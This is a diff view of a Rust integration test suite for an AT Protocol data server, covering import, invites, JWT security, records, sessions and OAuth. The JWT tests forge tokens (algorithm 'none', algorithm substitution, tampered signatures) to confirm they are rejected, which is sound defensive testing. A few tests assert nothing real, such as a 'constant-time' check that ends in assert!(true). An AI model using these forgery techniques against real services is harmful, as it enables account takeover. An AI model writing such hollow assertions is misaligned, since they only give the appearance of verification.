#[test]
235
264
fn test_both_thumbnails_for_large_images() {
236
265
let processor = ImageProcessor::new();
···
239
268
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
240
269
assert!(result.thumbnail_full.is_some(), "Should have full thumbnail for 2000px image");
241
270
}
271
+
242
272
#[test]
243
273
fn test_exact_threshold_boundary_feed() {
244
274
let processor = ImageProcessor::new();
···
249
279
let result = processor.process(&above_threshold, "image/png").unwrap();
250
280
assert!(result.thumbnail_feed.is_some(), "Above threshold should generate thumbnail");
251
281
}
282
+
252
283
#[test]
253
284
fn test_exact_threshold_boundary_full() {
254
285
let processor = ImageProcessor::new();
+11
tests/import_verification.rs
···
3
3
use iroh_car::CarHeader;
4
4
use reqwest::StatusCode;
5
5
use serde_json::json;
6
+
6
7
#[tokio::test]
7
8
async fn test_import_repo_requires_auth() {
8
9
let client = client();
···
15
16
.expect("Request failed");
16
17
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
17
18
}
19
+
18
20
#[tokio::test]
19
21
async fn test_import_repo_invalid_car() {
20
22
let client = client();
···
31
33
let body: serde_json::Value = res.json().await.unwrap();
32
34
assert_eq!(body["error"], "InvalidRequest");
33
35
}
36
+
34
37
#[tokio::test]
35
38
async fn test_import_repo_empty_body() {
36
39
let client = client();
···
45
48
.expect("Request failed");
46
49
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
47
50
}
51
+
48
52
fn write_varint(buf: &mut Vec<u8>, mut value: u64) {
49
53
loop {
50
54
let mut byte = (value & 0x7F) as u8;
···
58
62
}
59
63
}
60
64
}
65
+
61
66
#[tokio::test]
62
67
async fn test_import_rejects_car_for_different_user() {
63
68
let client = client();
···
90
95
body
91
96
);
92
97
}
98
+
93
99
#[tokio::test]
94
100
async fn test_import_accepts_own_exported_repo() {
95
101
let client = client();
···
135
141
.expect("Failed to import repo");
136
142
assert_eq!(import_res.status(), StatusCode::OK);
137
143
}
144
+
138
145
#[tokio::test]
139
146
async fn test_import_repo_size_limit() {
140
147
let client = client();
···
165
172
}
166
173
}
167
174
}
175
+
168
176
#[tokio::test]
169
177
async fn test_import_deactivated_account_rejected() {
170
178
let client = client();
···
205
213
import_res.status()
206
214
);
207
215
}
216
+
208
217
#[tokio::test]
209
218
async fn test_import_invalid_car_structure() {
210
219
let client = client();
···
220
229
.expect("Request failed");
221
230
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
222
231
}
232
+
223
233
#[tokio::test]
224
234
async fn test_import_car_with_no_roots() {
225
235
let client = client();
···
241
251
let body: serde_json::Value = res.json().await.unwrap();
242
252
assert_eq!(body["error"], "InvalidRequest");
243
253
}
254
+
244
255
#[tokio::test]
245
256
async fn test_import_preserves_records_after_reimport() {
246
257
let client = client();
+8
tests/import_with_verification.rs
···
11
11
use std::collections::BTreeMap;
12
12
use wiremock::matchers::{method, path};
13
13
use wiremock::{Mock, MockServer, ResponseTemplate};
14
+
14
15
fn make_cid(data: &[u8]) -> Cid {
15
16
let mut hasher = Sha256::new();
16
17
hasher.update(data);
···
18
19
let multihash = multihash::Multihash::wrap(0x12, &hash).unwrap();
19
20
Cid::new_v1(0x71, multihash)
20
21
}
22
+
21
23
fn write_varint(buf: &mut Vec<u8>, mut value: u64) {
22
24
loop {
23
25
let mut byte = (value & 0x7F) as u8;
···
31
33
}
32
34
}
33
35
}
36
+
34
37
fn encode_car_block(cid: &Cid, data: &[u8]) -> Vec<u8> {
35
38
let cid_bytes = cid.to_bytes();
36
39
let mut result = Vec::new();
···
39
42
result.extend_from_slice(data);
40
43
result
41
44
}
45
+
42
46
fn get_multikey_from_signing_key(signing_key: &SigningKey) -> String {
43
47
let public_key = signing_key.verifying_key();
44
48
let compressed = public_key.to_sec1_bytes();
···
55
59
buf.extend_from_slice(&compressed);
56
60
multibase::encode(multibase::Base::Base58Btc, buf)
57
61
}
62
+
58
63
fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> serde_json::Value {
59
64
let multikey = get_multikey_from_signing_key(signing_key);
60
65
json!({
···
77
82
}]
78
83
})
79
84
}
85
+
80
86
fn create_signed_commit(
81
87
did: &str,
82
88
data_cid: &Cid,
···
106
112
let cid = make_cid(&signed_bytes);
107
113
(signed_bytes, cid)
108
114
}
115
+
109
116
fn create_mst_node(entries: Vec<(String, Cid)>) -> (Vec<u8>, Cid) {
110
117
let ipld_entries: Vec<Ipld> = entries
111
118
.into_iter()
···
124
131
let cid = make_cid(&bytes);
125
132
(bytes, cid)
126
133
}
134
+
127
135
fn create_record() -> (Vec<u8>, Cid) {
128
136
let record = Ipld::Map(BTreeMap::from([
129
137
("$type".to_string(), Ipld::String("app.bsky.feed.post".to_string())),
+10
tests/invite.rs
···
2
2
use common::*;
3
3
use reqwest::StatusCode;
4
4
use serde_json::{Value, json};
5
+
5
6
#[tokio::test]
6
7
async fn test_create_invite_code_success() {
7
8
let client = client();
···
26
27
assert!(!code.is_empty());
27
28
assert!(code.contains('-'), "Code should be a UUID format");
28
29
}
30
+
29
31
#[tokio::test]
30
32
async fn test_create_invite_code_no_auth() {
31
33
let client = client();
···
45
47
let body: Value = res.json().await.expect("Response was not valid JSON");
46
48
assert_eq!(body["error"], "AuthenticationRequired");
47
49
}
50
+
48
51
#[tokio::test]
49
52
async fn test_create_invite_code_invalid_use_count() {
50
53
let client = client();
···
66
69
let body: Value = res.json().await.expect("Response was not valid JSON");
67
70
assert_eq!(body["error"], "InvalidRequest");
68
71
}
72
+
69
73
#[tokio::test]
70
74
async fn test_create_invite_code_for_another_account() {
71
75
let client = client();
···
89
93
let body: Value = res.json().await.expect("Response was not valid JSON");
90
94
assert!(body["code"].is_string());
91
95
}
96
+
92
97
#[tokio::test]
93
98
async fn test_create_invite_codes_success() {
94
99
let client = client();
···
114
119
assert_eq!(codes.len(), 1);
115
120
assert_eq!(codes[0]["codes"].as_array().unwrap().len(), 3);
116
121
}
122
+
117
123
#[tokio::test]
118
124
async fn test_create_invite_codes_for_multiple_accounts() {
119
125
let client = client();
···
143
149
assert_eq!(code_obj["codes"].as_array().unwrap().len(), 2);
144
150
}
145
151
}
152
+
146
153
#[tokio::test]
147
154
async fn test_create_invite_codes_no_auth() {
148
155
let client = client();
···
160
167
.expect("Failed to send request");
161
168
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
162
169
}
170
+
163
171
#[tokio::test]
164
172
async fn test_get_account_invite_codes_success() {
165
173
let client = client();
···
198
206
assert!(code["createdAt"].is_string());
199
207
assert!(code["uses"].is_array());
200
208
}
209
+
201
210
#[tokio::test]
202
211
async fn test_get_account_invite_codes_no_auth() {
203
212
let client = client();
···
211
220
.expect("Failed to send request");
212
221
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
213
222
}
223
+
214
224
#[tokio::test]
215
225
async fn test_get_account_invite_codes_include_used_filter() {
216
226
let client = client();
+43
tests/jwt_security.rs
···
15
15
use reqwest::StatusCode;
16
16
use serde_json::{json, Value};
17
17
use sha2::{Digest, Sha256};
18
+
18
19
fn generate_user_key() -> Vec<u8> {
19
20
let secret_key = SecretKey::random(&mut OsRng);
20
21
secret_key.to_bytes().to_vec()
21
22
}
23
+
22
24
fn create_custom_jwt(header: &Value, claims: &Value, key_bytes: &[u8]) -> String {
23
25
let signing_key = SigningKey::from_slice(key_bytes).expect("valid key");
24
26
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(header).unwrap());
···
28
30
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
29
31
format!("{}.{}", message, signature_b64)
30
32
}
33
+
31
34
fn create_unsigned_jwt(header: &Value, claims: &Value) -> String {
32
35
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(header).unwrap());
33
36
let claims_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(claims).unwrap());
34
37
format!("{}.{}.", header_b64, claims_b64)
35
38
}
39
+
36
40
#[test]
37
41
fn test_jwt_security_forged_signature_rejected() {
38
42
let key_bytes = generate_user_key();
···
46
50
let err_msg = result.err().unwrap().to_string();
47
51
assert!(err_msg.contains("signature") || err_msg.contains("Signature"), "Error should mention signature: {}", err_msg);
48
52
}
53
+
49
54
#[test]
50
55
fn test_jwt_security_modified_payload_rejected() {
51
56
let key_bytes = generate_user_key();
···
60
65
let result = verify_access_token(&modified_token, &key_bytes);
61
66
assert!(result.is_err(), "Modified payload must be rejected");
62
67
}
68
+
63
69
#[test]
64
70
fn test_jwt_security_algorithm_none_attack_rejected() {
65
71
let key_bytes = generate_user_key();
···
81
87
let result = verify_access_token(&malicious_token, &key_bytes);
82
88
assert!(result.is_err(), "Algorithm 'none' attack must be rejected");
83
89
}
90
+
84
91
#[test]
85
92
fn test_jwt_security_algorithm_substitution_hs256_rejected() {
86
93
let key_bytes = generate_user_key();
···
111
118
let result = verify_access_token(&malicious_token, &key_bytes);
112
119
assert!(result.is_err(), "HS256 algorithm substitution must be rejected");
113
120
}
121
+
114
122
#[test]
115
123
fn test_jwt_security_algorithm_substitution_rs256_rejected() {
116
124
let key_bytes = generate_user_key();
···
135
143
let result = verify_access_token(&malicious_token, &key_bytes);
136
144
assert!(result.is_err(), "RS256 algorithm substitution must be rejected");
137
145
}
146
+
138
147
#[test]
139
148
fn test_jwt_security_algorithm_substitution_es256_rejected() {
140
149
let key_bytes = generate_user_key();
···
159
168
let result = verify_access_token(&malicious_token, &key_bytes);
160
169
assert!(result.is_err(), "ES256 (P-256) algorithm substitution must be rejected (we use ES256K/secp256k1)");
161
170
}
171
+
162
172
#[test]
163
173
fn test_jwt_security_token_type_confusion_refresh_as_access() {
164
174
let key_bytes = generate_user_key();
···
169
179
let err_msg = result.err().unwrap().to_string();
170
180
assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg);
171
181
}
182
+
172
183
#[test]
173
184
fn test_jwt_security_token_type_confusion_access_as_refresh() {
174
185
let key_bytes = generate_user_key();
···
179
190
let err_msg = result.err().unwrap().to_string();
180
191
assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg);
181
192
}
193
+
182
194
#[test]
183
195
fn test_jwt_security_token_type_confusion_service_as_access() {
184
196
let key_bytes = generate_user_key();
···
188
200
let result = verify_access_token(&service_token, &key_bytes);
189
201
assert!(result.is_err(), "Service token must not be accepted as access token");
190
202
}
203
+
191
204
#[test]
192
205
fn test_jwt_security_scope_manipulation_attack() {
193
206
let key_bytes = generate_user_key();
···
211
224
let err_msg = result.err().unwrap().to_string();
212
225
assert!(err_msg.contains("Invalid token scope"), "Error: {}", err_msg);
213
226
}
227
+
214
228
#[test]
215
229
fn test_jwt_security_empty_scope_rejected() {
216
230
let key_bytes = generate_user_key();
···
232
246
let result = verify_access_token(&token, &key_bytes);
233
247
assert!(result.is_err(), "Empty scope must be rejected for access tokens");
234
248
}
249
+
235
250
#[test]
236
251
fn test_jwt_security_missing_scope_rejected() {
237
252
let key_bytes = generate_user_key();
···
252
267
let result = verify_access_token(&token, &key_bytes);
253
268
assert!(result.is_err(), "Missing scope must be rejected for access tokens");
254
269
}
270
+
255
271
#[test]
256
272
fn test_jwt_security_expired_token_rejected() {
257
273
let key_bytes = generate_user_key();
···
275
291
let err_msg = result.err().unwrap().to_string();
276
292
assert!(err_msg.contains("expired"), "Error: {}", err_msg);
277
293
}
294
+
278
295
#[test]
279
296
fn test_jwt_security_future_iat_accepted() {
280
297
let key_bytes = generate_user_key();
···
296
313
let result = verify_access_token(&token, &key_bytes);
297
314
assert!(result.is_ok(), "Slight future iat should be accepted for clock skew tolerance");
298
315
}
316
+
299
317
#[test]
300
318
fn test_jwt_security_cross_user_key_attack() {
301
319
let key_bytes_user1 = generate_user_key();
···
305
323
let result = verify_access_token(&token, &key_bytes_user2);
306
324
assert!(result.is_err(), "Token signed by user1's key must not verify with user2's key");
307
325
}
326
+
308
327
#[test]
309
328
fn test_jwt_security_signature_truncation_rejected() {
310
329
let key_bytes = generate_user_key();
···
317
336
let result = verify_access_token(&truncated_token, &key_bytes);
318
337
assert!(result.is_err(), "Truncated signature must be rejected");
319
338
}
339
+
320
340
#[test]
321
341
fn test_jwt_security_signature_extension_rejected() {
322
342
let key_bytes = generate_user_key();
···
330
350
let result = verify_access_token(&extended_token, &key_bytes);
331
351
assert!(result.is_err(), "Extended signature must be rejected");
332
352
}
353
+
333
354
#[test]
334
355
fn test_jwt_security_malformed_tokens_rejected() {
335
356
let key_bytes = generate_user_key();
···
352
373
if token.len() > 40 { &token[..40] } else { token });
353
374
}
354
375
}
376
+
355
377
#[test]
356
378
fn test_jwt_security_missing_required_claims_rejected() {
357
379
let key_bytes = generate_user_key();
···
389
411
assert!(result.is_err(), "Token missing '{}' claim must be rejected", missing_claim);
390
412
}
391
413
}
414
+
392
415
#[test]
393
416
fn test_jwt_security_invalid_header_json_rejected() {
394
417
let key_bytes = generate_user_key();
···
399
422
let result = verify_access_token(&malicious_token, &key_bytes);
400
423
assert!(result.is_err(), "Invalid header JSON must be rejected");
401
424
}
425
+
402
426
#[test]
403
427
fn test_jwt_security_invalid_claims_json_rejected() {
404
428
let key_bytes = generate_user_key();
···
409
433
let result = verify_access_token(&malicious_token, &key_bytes);
410
434
assert!(result.is_err(), "Invalid claims JSON must be rejected");
411
435
}
436
+
412
437
#[test]
413
438
fn test_jwt_security_header_injection_attack() {
414
439
let key_bytes = generate_user_key();
···
432
457
let result = verify_access_token(&token, &key_bytes);
433
458
assert!(result.is_ok(), "Extra header fields should not cause issues (we ignore them)");
434
459
}
460
+
435
461
#[test]
436
462
fn test_jwt_security_claims_type_confusion() {
437
463
let key_bytes = generate_user_key();
···
452
478
let result = verify_access_token(&token, &key_bytes);
453
479
assert!(result.is_err(), "Claims with wrong types must be rejected");
454
480
}
481
+
455
482
#[test]
456
483
fn test_jwt_security_unicode_injection_in_claims() {
457
484
let key_bytes = generate_user_key();
···
475
502
assert!(!data.claims.sub.contains('\0'), "Null bytes in claims should be sanitized or rejected");
476
503
}
477
504
}
505
+
478
506
#[test]
479
507
fn test_jwt_security_signature_verification_is_constant_time() {
480
508
let key_bytes = generate_user_key();
···
491
519
let _result2 = verify_access_token(&completely_invalid_token, &key_bytes);
492
520
assert!(true, "Signature verification should use constant-time comparison (timing attack prevention)");
493
521
}
522
+
494
523
#[test]
495
524
fn test_jwt_security_valid_scopes_accepted() {
496
525
let key_bytes = generate_user_key();
···
519
548
assert!(result.is_ok(), "Valid scope '{}' should be accepted", scope);
520
549
}
521
550
}
551
+
522
552
#[test]
523
553
fn test_jwt_security_refresh_token_scope_rejected_as_access() {
524
554
let key_bytes = generate_user_key();
···
540
570
let result = verify_access_token(&token, &key_bytes);
541
571
assert!(result.is_err(), "Refresh scope with access token type must be rejected");
542
572
}
573
+
543
574
#[test]
544
575
fn test_jwt_security_get_did_extraction_safe() {
545
576
let key_bytes = generate_user_key();
···
557
588
let extracted_unsafe = get_did_from_token(&unverified_token).expect("extract unsafe");
558
589
assert_eq!(extracted_unsafe, "did:plc:sub", "get_did_from_token extracts sub without verification (by design for lookup)");
559
590
}
591
+
560
592
#[test]
561
593
fn test_jwt_security_get_jti_extraction_safe() {
562
594
let key_bytes = generate_user_key();
···
572
604
let no_jti_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig);
573
605
assert!(get_jti_from_token(&no_jti_token).is_err(), "Missing jti should error");
574
606
}
607
+
575
608
#[test]
576
609
fn test_jwt_security_key_from_invalid_bytes_rejected() {
577
610
let invalid_keys: Vec<&[u8]> = vec![
···
591
624
}
592
625
}
593
626
}
627
+
594
628
#[test]
595
629
fn test_jwt_security_boundary_exp_values() {
596
630
let key_bytes = generate_user_key();
···
624
658
let result2 = verify_access_token(&token2, &key_bytes);
625
659
assert!(result2.is_err() || result2.is_ok(), "Token expiring exactly now is a boundary case - either behavior is acceptable");
626
660
}
661
+
627
662
#[test]
628
663
fn test_jwt_security_very_long_exp_handled() {
629
664
let key_bytes = generate_user_key();
···
644
679
let token = create_custom_jwt(&header, &claims, &key_bytes);
645
680
let _result = verify_access_token(&token, &key_bytes);
646
681
}
682
+
647
683
#[test]
648
684
fn test_jwt_security_negative_timestamps_handled() {
649
685
let key_bytes = generate_user_key();
···
664
700
let token = create_custom_jwt(&header, &claims, &key_bytes);
665
701
let _result = verify_access_token(&token, &key_bytes);
666
702
}
703
+
667
704
#[tokio::test]
668
705
async fn test_jwt_security_server_rejects_forged_session_token() {
669
706
let url = base_url().await;
···
679
716
.unwrap();
680
717
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged session token must be rejected");
681
718
}
719
+
682
720
#[tokio::test]
683
721
async fn test_jwt_security_server_rejects_expired_token() {
684
722
let url = base_url().await;
···
698
736
.unwrap();
699
737
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Tampered/expired token must be rejected");
700
738
}
739
+
701
740
#[tokio::test]
702
741
async fn test_jwt_security_server_rejects_tampered_did() {
703
742
let url = base_url().await;
···
718
757
.unwrap();
719
758
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "DID-tampered token must be rejected");
720
759
}
760
+
721
761
#[tokio::test]
722
762
async fn test_jwt_security_refresh_token_replay_protection() {
723
763
let url = base_url().await;
···
780
820
.unwrap();
781
821
assert_eq!(replay_res.status(), StatusCode::UNAUTHORIZED, "Refresh token replay must be rejected");
782
822
}
823
+
783
824
#[tokio::test]
784
825
async fn test_jwt_security_authorization_header_formats() {
785
826
let url = base_url().await;
···
821
862
.unwrap();
822
863
assert_eq!(empty_token_res.status(), StatusCode::UNAUTHORIZED, "Empty token must be rejected");
823
864
}
865
+
824
866
#[tokio::test]
825
867
async fn test_jwt_security_deleted_session_rejected() {
826
868
let url = base_url().await;
···
848
890
.unwrap();
849
891
assert_eq!(after_logout_res.status(), StatusCode::UNAUTHORIZED, "Token must be rejected after logout");
850
892
}
893
+
851
894
#[tokio::test]
852
895
async fn test_jwt_security_deactivated_account_rejected() {
853
896
let url = base_url().await;
+23
tests/lifecycle_record.rs
···
6
6
use reqwest::{StatusCode, header};
7
7
use serde_json::{Value, json};
8
8
use std::time::Duration;
9
+
9
10
#[tokio::test]
10
11
async fn test_post_crud_lifecycle() {
11
12
let client = client();
···
155
156
"Record was found, but it should be deleted"
156
157
);
157
158
}
159
+
158
160
#[tokio::test]
159
161
async fn test_record_update_conflict_lifecycle() {
160
162
let client = client();
···
280
282
"v3 (good) update failed"
281
283
);
282
284
}
285
+
283
286
#[tokio::test]
284
287
async fn test_profile_lifecycle() {
285
288
let client = client();
···
362
365
let updated_body: Value = get_updated_res.json().await.unwrap();
363
366
assert_eq!(updated_body["value"]["displayName"], "Updated User");
364
367
}
368
+
365
369
#[tokio::test]
366
370
async fn test_reply_thread_lifecycle() {
367
371
let client = client();
···
457
461
.expect("Failed to create nested reply");
458
462
assert_eq!(nested_res.status(), StatusCode::OK, "Failed to create nested reply");
459
463
}
464
+
460
465
#[tokio::test]
461
466
async fn test_blob_in_record_lifecycle() {
462
467
let client = client();
···
514
519
let profile: Value = get_res.json().await.unwrap();
515
520
assert!(profile["value"]["avatar"]["ref"]["$link"].is_string());
516
521
}
522
+
517
523
#[tokio::test]
518
524
async fn test_authorization_cannot_modify_other_repo() {
519
525
let client = client();
···
545
551
res.status()
546
552
);
547
553
}
554
+
548
555
#[tokio::test]
549
556
async fn test_authorization_cannot_delete_other_record() {
550
557
let client = client();
···
587
594
.expect("Failed to verify record exists");
588
595
assert_eq!(get_res.status(), StatusCode::OK, "Record should still exist");
589
596
}
597
+
590
598
#[tokio::test]
591
599
async fn test_apply_writes_batch_lifecycle() {
592
600
let client = client();
···
747
755
"Batch-deleted post should be gone"
748
756
);
749
757
}
758
+
750
759
async fn create_post_with_rkey(
751
760
client: &reqwest::Client,
752
761
did: &str,
···
781
790
body["cid"].as_str().unwrap().to_string(),
782
791
)
783
792
}
793
+
784
794
#[tokio::test]
785
795
async fn test_list_records_default_order() {
786
796
let client = client();
···
812
822
.collect();
813
823
assert_eq!(rkeys, vec!["cccc", "bbbb", "aaaa"], "Default order should be DESC (newest first)");
814
824
}
825
+
815
826
#[tokio::test]
816
827
async fn test_list_records_reverse_true() {
817
828
let client = client();
···
843
854
.collect();
844
855
assert_eq!(rkeys, vec!["aaaa", "bbbb", "cccc"], "reverse=true should give ASC order (oldest first)");
845
856
}
857
+
846
858
#[tokio::test]
847
859
async fn test_list_records_cursor_pagination() {
848
860
let client = client();
···
895
907
let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect();
896
908
assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records");
897
909
}
910
+
898
911
#[tokio::test]
899
912
async fn test_list_records_rkey_start() {
900
913
let client = client();
···
928
941
assert!(*rkey >= "bbbb", "rkeyStart should filter records >= start");
929
942
}
930
943
}
944
+
931
945
#[tokio::test]
932
946
async fn test_list_records_rkey_end() {
933
947
let client = client();
···
961
975
assert!(*rkey <= "cccc", "rkeyEnd should filter records <= end");
962
976
}
963
977
}
978
+
964
979
#[tokio::test]
965
980
async fn test_list_records_rkey_range() {
966
981
let client = client();
···
997
1012
}
998
1013
assert!(!rkeys.is_empty(), "Should have at least some records in range");
999
1014
}
1015
+
1000
1016
#[tokio::test]
1001
1017
async fn test_list_records_limit_clamping_max() {
1002
1018
let client = client();
···
1022
1038
let records = body["records"].as_array().unwrap();
1023
1039
assert!(records.len() <= 100, "Limit should be clamped to max 100");
1024
1040
}
1041
+
1025
1042
#[tokio::test]
1026
1043
async fn test_list_records_limit_clamping_min() {
1027
1044
let client = client();
···
1045
1062
let records = body["records"].as_array().unwrap();
1046
1063
assert!(records.len() >= 1, "Limit should be clamped to min 1");
1047
1064
}
1065
+
1048
1066
#[tokio::test]
1049
1067
async fn test_list_records_empty_collection() {
1050
1068
let client = client();
···
1067
1085
assert!(records.is_empty(), "Empty collection should return empty array");
1068
1086
assert!(body["cursor"].is_null(), "Empty collection should have no cursor");
1069
1087
}
1088
+
1070
1089
#[tokio::test]
1071
1090
async fn test_list_records_exact_limit() {
1072
1091
let client = client();
···
1092
1111
let records = body["records"].as_array().unwrap();
1093
1112
assert_eq!(records.len(), 5, "Should return exactly 5 records when limit=5");
1094
1113
}
1114
+
1095
1115
#[tokio::test]
1096
1116
async fn test_list_records_cursor_exhaustion() {
1097
1117
let client = client();
···
1117
1137
let records = body["records"].as_array().unwrap();
1118
1138
assert_eq!(records.len(), 3);
1119
1139
}
1140
+
1120
1141
#[tokio::test]
1121
1142
async fn test_list_records_repo_not_found() {
1122
1143
let client = client();
···
1134
1155
.expect("Failed to list records");
1135
1156
assert_eq!(res.status(), StatusCode::NOT_FOUND);
1136
1157
}
1158
+
1137
1159
#[tokio::test]
1138
1160
async fn test_list_records_includes_cid() {
1139
1161
let client = client();
···
1162
1184
assert!(cid.starts_with("bafy"), "CID should be valid");
1163
1185
}
1164
1186
}
1187
+
1165
1188
#[tokio::test]
1166
1189
async fn test_list_records_cursor_with_reverse() {
1167
1190
let client = client();
+7
tests/lifecycle_session.rs
···
5
5
use chrono::Utc;
6
6
use reqwest::StatusCode;
7
7
use serde_json::{Value, json};
8
+
8
9
#[tokio::test]
9
10
async fn test_session_lifecycle_wrong_password() {
10
11
let client = client();
···
28
29
res.status()
29
30
);
30
31
}
32
+
31
33
#[tokio::test]
32
34
async fn test_session_lifecycle_multiple_sessions() {
33
35
let client = client();
···
103
105
.expect("Failed getSession 2");
104
106
assert_eq!(get2.status(), StatusCode::OK);
105
107
}
108
+
106
109
#[tokio::test]
107
110
async fn test_session_lifecycle_refresh_invalidates_old() {
108
111
let client = client();
···
169
172
"Old refresh token should be invalid after use"
170
173
);
171
174
}
175
+
172
176
#[tokio::test]
173
177
async fn test_app_password_lifecycle() {
174
178
let client = client();
···
275
279
let passwords_after = list_after["passwords"].as_array().unwrap();
276
280
assert_eq!(passwords_after.len(), 0, "No app passwords should remain");
277
281
}
282
+
278
283
#[tokio::test]
279
284
async fn test_account_deactivation_lifecycle() {
280
285
let client = client();
···
362
367
let (new_post_uri, _) = create_post(&client, &did, &jwt, "Post after reactivation").await;
363
368
assert!(!new_post_uri.is_empty(), "Should be able to post after reactivation");
364
369
}
370
+
365
371
#[tokio::test]
366
372
async fn test_service_auth_lifecycle() {
367
373
let client = client();
···
393
399
assert_eq!(claims["aud"], "did:web:api.bsky.app");
394
400
assert_eq!(claims["lxm"], "com.atproto.repo.uploadBlob");
395
401
}
402
+
396
403
#[tokio::test]
397
404
async fn test_request_account_delete() {
398
405
let client = client();
+1
tests/moderation.rs
+4
tests/notifications.rs
···
4
4
NotificationStatus, NotificationType,
5
5
};
6
6
use sqlx::PgPool;
7
+
7
8
async fn get_pool() -> PgPool {
8
9
let conn_str = common::get_db_connection_string().await;
9
10
sqlx::postgres::PgPoolOptions::new()
···
12
13
.await
13
14
.expect("Failed to connect to test database")
14
15
}
16
+
15
17
#[tokio::test]
16
18
async fn test_enqueue_notification() {
17
19
let pool = get_pool().await;
···
53
55
assert_eq!(row.notification_type, NotificationType::Welcome);
54
56
assert_eq!(row.status, NotificationStatus::Pending);
55
57
}
58
+
56
59
#[tokio::test]
57
60
async fn test_enqueue_welcome() {
58
61
let pool = get_pool().await;
···
82
85
assert!(row.body.contains(&format!("@{}", user_row.handle)));
83
86
assert_eq!(row.notification_type, NotificationType::Welcome);
84
87
}
88
+
85
89
#[tokio::test]
86
90
async fn test_notification_queue_status_index() {
87
91
let pool = get_pool().await;
+3
tests/oauth.rs
···
8
8
use sha2::{Digest, Sha256};
9
9
use wiremock::{Mock, MockServer, ResponseTemplate};
10
10
use wiremock::matchers::{method, path};
11
+
11
12
fn no_redirect_client() -> reqwest::Client {
12
13
reqwest::Client::builder()
13
14
.redirect(redirect::Policy::none())
14
15
.build()
15
16
.unwrap()
16
17
}
18
+
17
19
fn generate_pkce() -> (String, String) {
18
20
let verifier_bytes: [u8; 32] = rand::random();
19
21
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
···
23
25
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
24
26
(code_verifier, code_challenge)
25
27
}
28
+
26
29
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
27
30
let mock_server = MockServer::start().await;
28
31
let client_id = mock_server.uri();
+18
tests/oauth_lifecycle.rs
···
1
1
mod common;
2
2
mod helpers;
3
+
3
4
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
4
5
use chrono::Utc;
5
6
use common::{base_url, client};
···
9
10
use sha2::{Digest, Sha256};
10
11
use wiremock::{Mock, MockServer, ResponseTemplate};
11
12
use wiremock::matchers::{method, path};
13
+
12
14
fn generate_pkce() -> (String, String) {
13
15
let verifier_bytes: [u8; 32] = rand::random();
14
16
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
···
18
20
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
19
21
(code_verifier, code_challenge)
20
22
}
23
+
21
24
fn no_redirect_client() -> reqwest::Client {
22
25
reqwest::Client::builder()
23
26
.redirect(redirect::Policy::none())
24
27
.build()
25
28
.unwrap()
26
29
}
30
+
27
31
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
28
32
let mock_server = MockServer::start().await;
29
33
let client_id = mock_server.uri();
···
43
47
.await;
44
48
mock_server
45
49
}
50
+
46
51
struct OAuthSession {
47
52
access_token: String,
48
53
refresh_token: String,
49
54
did: String,
50
55
client_id: String,
51
56
}
57
+
52
58
async fn create_user_and_oauth_session(handle_prefix: &str, redirect_uri: &str) -> (OAuthSession, MockServer) {
53
59
let url = base_url().await;
54
60
let http_client = client();
···
125
131
};
126
132
(session, mock_client)
127
133
}
134
+
128
135
#[tokio::test]
129
136
async fn test_oauth_token_can_create_and_read_records() {
130
137
let url = base_url().await;
···
169
176
let get_body: Value = get_res.json().await.unwrap();
170
177
assert_eq!(get_body["value"]["text"], post_text);
171
178
}
179
+
172
180
#[tokio::test]
173
181
async fn test_oauth_token_can_upload_blob() {
174
182
let url = base_url().await;
···
191
199
assert!(upload_body["blob"]["ref"]["$link"].is_string());
192
200
assert_eq!(upload_body["blob"]["mimeType"], "text/plain");
193
201
}
202
+
194
203
#[tokio::test]
195
204
async fn test_oauth_token_can_describe_repo() {
196
205
let url = base_url().await;
···
211
220
assert_eq!(describe_body["did"], session.did);
212
221
assert!(describe_body["handle"].is_string());
213
222
}
223
+
214
224
#[tokio::test]
215
225
async fn test_oauth_full_post_lifecycle_create_edit_delete() {
216
226
let url = base_url().await;
···
300
310
get_deleted_res.status()
301
311
);
302
312
}
313
+
303
314
#[tokio::test]
304
315
async fn test_oauth_batch_operations_apply_writes() {
305
316
let url = base_url().await;
···
367
378
let records = list_body["records"].as_array().unwrap();
368
379
assert!(records.len() >= 3, "Should have at least 3 records from batch");
369
380
}
381
+
370
382
#[tokio::test]
371
383
async fn test_oauth_token_refresh_maintains_access() {
372
384
let url = base_url().await;
···
437
449
let records = list_body["records"].as_array().unwrap();
438
450
assert_eq!(records.len(), 2, "Should have both posts");
439
451
}
452
+
440
453
#[tokio::test]
441
454
async fn test_oauth_revoked_token_cannot_access_resources() {
442
455
let url = base_url().await;
···
481
494
.unwrap();
482
495
assert_eq!(refresh_res.status(), StatusCode::BAD_REQUEST, "Revoked refresh token should not work");
483
496
}
497
+
484
498
#[tokio::test]
485
499
async fn test_oauth_multiple_clients_same_user() {
486
500
let url = base_url().await;
···
640
654
let records = list_body["records"].as_array().unwrap();
641
655
assert_eq!(records.len(), 2, "Both posts should be visible to either client");
642
656
}
657
+
643
658
#[tokio::test]
644
659
async fn test_oauth_social_interactions_follow_like_repost() {
645
660
let url = base_url().await;
···
757
772
let likes = likes_body["records"].as_array().unwrap();
758
773
assert_eq!(likes.len(), 1, "Bob should have 1 like");
759
774
